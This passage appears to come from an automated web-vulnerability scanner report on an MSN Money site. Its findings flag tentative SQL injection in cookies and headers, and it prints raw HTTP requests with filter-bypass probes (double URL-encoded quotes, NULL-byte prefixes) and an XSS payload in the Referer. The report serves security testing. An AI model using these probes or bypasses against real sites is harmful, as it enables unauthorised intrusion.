ETag: "09090c1b8abcb1:1a400"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 15:09:24 GMT
Content-Length: 568

(function()
{String.prototype.setCookie=function(value,expiryDays,domain,path,secure)
{var builder=[this,"=",value];if(expiryDays)
{var date=new Date();date.setTime(date.getTime()+(expiryDays*864
...[SNIP]...

1.32. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MUID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/utilities/cookies.js

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:15 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:32 GMT
Accept-Ranges: bytes
ETag: "09090c1b8abcb1:1a400"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 19:55:15 GMT
Content-Length: 568

(function()
{String.prototype.setCookie=function(value,expiryDays,domain,path,secure)
{var builder=[this,"=",value];if(expiryDays)
{var date=new Date();date.setTime(date.getTime()+(expiryDays*864
...[SNIP]...

1.33. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [CULTURE cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/utilities/getcookie.js

Issue detail

The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:24 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:16c4d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:24 GMT
Content-Length: 193

(function()
{String.prototype.getCookie=function()
{var re=new RegExp('\\b'+this+'\\s*=\\s*([^;]*)','i');var match=re.exec(document.cookie);return(match&&match.length>1?match[1]:'');};})();

1.34. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [v1st cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/utilities/getcookie.js

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:11 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:11 GMT
Content-Length: 193

(function()
{String.prototype.getCookie=function()
{var re=new RegExp('\\b'+this+'\\s*=\\s*([^;]*)','i');var match=re.exec(document.cookie);return(match&&match.length>1?match[1]:'');};})();

1.35. http://redacted/inc/Views/Shared/Core/Content/js/utilities/stringutils.js [v1st cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/utilities/stringutils.js

Issue detail

Remediation detail

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/stringutils.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/stringutils.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:16c4d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:23 GMT
Content-Length: 576

(function()
{String.prototype.format=function()
{for(var fmt=this,ndx=0;ndx<arguments.length;++ndx)
{fmt=fmt.replace(new RegExp('\\{'+ndx+'\\}',"g"),arguments[ndx]);}
return fmt;};String.prototy
...[SNIP]...

1.36. http://redacted/inc/Views/Shared/Core/Content/js/utility.js [SRCHHPGUSR cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/utility.js

Issue detail

The SRCHHPGUSR cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHHPGUSR cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SRCHHPGUSR cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1%2527; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1%2527%2527; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:29 GMT
Accept-Ranges: bytes
ETag: "80ccc6bfb8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:51 GMT
Content-Length: 753

(function($)
{$.extend({getQuoteDetailUrl:function(type,symbol,server)
{var url="/investments/stock-price?symbol=";if(type)
{switch(type.toUpperCase())
{case"PUTOPTION":url="/investments/trading
...[SNIP]...

1.37. http://redacted/inc/css/ww.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/css/ww.css

Issue detail

Request 1

GET /inc/css'/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/css''/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Content-Length: 10099
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title
...[SNIP]...

1.38. http://redacted/inc/css/ww.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/css/ww.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /inc/css/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:47 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/css/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Content-Length: 458
Content-Type: text/css
Last-Modified: Tue, 04 Jan 2011 02:38:39 GMT
Accept-Ranges: bytes
ETag: "9f373f7eb8abcb1:161bf"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:48 GMT
Connection: close

#wwFra{z-index:1000000;border:1px solid #666;line-height:1.33em;width:500px;display:none;position:absolute;font:10pt arial,sans-serif;color:#333}#wwTbl{width:100%}#wwTbl td{padding:.4em 1em;vertical-a
...[SNIP]...

1.39. http://redacted/inc/scr/ajaxquotes.js [Sample cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/scr/ajaxquotes.js

Issue detail

The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /inc/scr/ajaxquotes.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69%00'; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:54:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/ajaxquotes.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69%00''; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:24 GMT
Accept-Ranges: bytes
ETag: "0228fe0b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:54:24 GMT
Content-Length: 10160

if(typeof(Msn)=="undefined")
{Msn={};}
if(typeof(Msn.Money)=="undefined")
{Msn.Money={};}
if(typeof(Msn.Money.Quote)=="undefined")
{Msn.Money.Quote={};}
Msn.Money.Quote.Enums={Zero:{AsIs:0,NA:
...[SNIP]...

1.40. http://redacted/inc/scr/userchoice.js [MC1 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/scr/userchoice.js

Issue detail

Remediation detail

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
